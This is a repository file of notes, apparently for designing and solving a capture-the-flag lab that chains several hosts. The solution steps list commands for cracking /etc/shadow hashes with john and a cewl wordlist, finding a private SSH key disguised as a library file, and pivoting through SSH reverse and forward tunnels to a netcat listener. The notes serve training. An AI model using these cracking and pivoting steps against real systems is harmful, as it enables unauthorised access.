master
Raw Download raw file 
 1
 2
 3gotty > student@c2t2-000-bchd
 4
 5  STEPS:
 6    0. find a throw away flag (first) 
 7       grep COG *.txt
 8    1. find the port 1863 in (ss or netstat for outbound ssh connections on the port)
 9       - watch -n1 -d ss -antp
10       - tcpdump -i ens3 not port 2222 and ip
11    2. run john on the etc passwd to get the axel user's password
12       - 
13         sudo apt install cewl john
14         python -m SimpleHTTPServer &
15         cewl localhost:8000/heimskringla.txt -w words
16         sudo john --wordlist=words /etc/shadow
17         # HINT: only do the hash you want (avoid 656000 rounds on the student user)
18    3. find the hostname crust 
19       nslookip <IP from ss -ant>
20    4. 
21
22axel@crust
23
24  STEPS:
25    1. find the PEM private key file burried on the crust server 
26       find / -type f  2>/dev/null | grep ".so$" | xargs -I {} -P0 file {} | egrep -v "ELF|ASCII|python|terminfo"
27       ssh-keygen -l -f <FILE> 
28    2. ssh to mantle (but more needs done on axel)
29    3. watch the syslog that is running on crust
30       a. cat flag into the log every 5 min, netstat and failed attempts to connect to port 1337
31    4. use that key to get to lindenbrock@mantle -> no bash just a key 
32
33lindenbrock@mantle
34
35  STEPS:
36    0. no shell here -- But GatewayPorts yes 
37    1. port forward 1337 reverse to netcat to recieve a flag and a clue for how to get to core (BONUS wireguard?)
38       ssh lindenbrock@c2t2-001-mantle -i /usr/lib/x86_64-linux-gnu/coreutils/libstdkey.so -NT -R 0.0.0.0:1337:localhost:1337 -v
39       on crust nc -l -p 1337       
40       save output to file 
41       ssh-keygen -l -f <FILE>
42    3. Forward tunnel to core 
43       ssh lindenbrock@c2t2-001-mantle -i /usr/lib/x86_64-linux-gnu/coreutils/libstdkey.so -NT -L 22175:c2t2-001-core:22175 -v
44
45lindenbrock@core
46
47  STEPS:
48    0. play game
49
50CONFIG Changes:
51
52  bchd:
53    - <x> Add axel user to bchd with a easily john'd password
54    - <x> FLAG: /bin/nope for axel's shell
55    - <x> CLUE_FILE: Norse book with axel@crust password and flag in int
56    - <x> outbound cron job sshing to crust
57
58  crust: 
59    - <~> ssh port 1862 on crust
60    - <x> Disable student ssh login with echo shell
61    - <x> FLAG FILE: pem is somewhere on this machine - flag in it
62    - <x> rsylog server
63
64  mantle: 
65    - <x> lindenbrock public key auth
66    - <x> rsyslog client
67    - <x> sshd GatewayPorts yes
68    - <x> log new inbound connections
69
70  core: 
71    - <x> netcat cron job to mantle port 1337
72    - <x> authorized key proxy traffic to tower 22175
73    - <~> ssh port 22175
74    - <x> only allow ssh traffic from tower and mantle - ansible from="mantleip"
75
76BONUS:
77
78change MOTD on all servers
79fake logs into crust rsyslog